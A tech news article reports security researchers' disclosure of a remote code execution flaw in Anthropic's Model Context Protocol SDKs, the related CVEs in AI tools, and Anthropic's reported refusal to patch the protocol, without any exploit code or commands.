Skip to content
Tech News
← Back to articles

Anthropic's Model Context Protocol includes a critical remote code execution vulnerability — newly discovered exploit puts 200,000 AI servers at risk

read original get AI Security Monitoring Kit → more articles
Why This Matters

The discovery of a remote code execution vulnerability in Anthropic's Model Context Protocol (MCP) highlights significant security risks for the AI industry, especially given MCP's widespread adoption across major platforms and tools. The lack of a patch from Anthropic underscores the importance of security in open standards and the potential impact on millions of AI servers and users. This incident emphasizes the need for rigorous security practices in AI infrastructure development to protect against malicious exploits.

Key Takeaways

Security researchers at OX Security have exposed an architectural vulnerability in Anthropic's Model Context Protocol (MCP) that enables arbitrary remote code execution on any system running a vulnerable implementation. The flaw affects MCP's official SDKs across Python, TypeScript, Java, and Rust, and ripples through a supply chain spanning more than 150 million downloads and up to 200,000 server instances. Surprisingly, Anthropic declined to patch the protocol in response, telling researchers the behavior was "expected."

MCP is the open standard Anthropic created in late 2024 to let AI models connect to external tools, databases, and APIs. It was donated to the Linux Foundation's Agentic AI Foundation last December and has since been adopted by OpenAI, Google, and most major AI coding tools.

The vulnerability is in how MCP handles local process execution over its STDIO transport interface. User-controlled input can flow directly into command execution without sanitization — a design choice baked into the reference SDKs — meaning that every developer building on MCP inherits the exposure by default.

Article continues below

OX Security's research team identified four families of exploitation: unauthenticated UI injection in AI frameworks, hardening bypasses in tools like Flowise that were supposed to be protected, zero-click prompt injection in AI coding IDEs, including Windsurf and Cursor, and malicious package distribution through MCP marketplaces. The researchers successfully poisoned nine out of 11 MCP registries with a test payload and confirmed command execution on six live production platforms with paying customers.

The research produced at least 10 CVEs rated high or critical. LiteLLM (CVE-2026-30623) and Bisheng (CVE-2026-33224) have been patched, while Windsurf (CVE-2026-30615), which allowed zero-click local code execution, remains in a "reported" state alongside flaws in GPT Researcher, Agent Zero, LangChain-Chatchat, and DocsGPT.

OX Security said it repeatedly recommended a protocol-level fix to Anthropic, such as manifest-only execution or a command allowlist in the SDKs, that would have protected downstream users immediately, but Anthropic reportedly declined and didn’t object when the researchers said they intended to publish their report.

Ironically, the exposure comes less than a week after Anthropic launched Claude Mythos, a frontier model it’s hyping up as a tool to find security vulnerabilities in other organizations' software. That irony wasn’t lost on OX’s researchers, who noted that the findings were “a call to action” for Anthropic to apply that same commitment in its own infrastructure.

Stay On the Cutting Edge: Get the Tom's Hardware Newsletter Get Tom's Hardware's best news and in-depth reviews, straight to your inbox. Contact me with news and offers from other Future brands Receive email from us on behalf of our trusted partners or sponsors

It also follows the accidental leak of Claude Code's full source code through a public npm package at the end of March, which exposed roughly 500,000 lines of unobfuscated TypeScript before Anthropic pulled the file.

... continue reading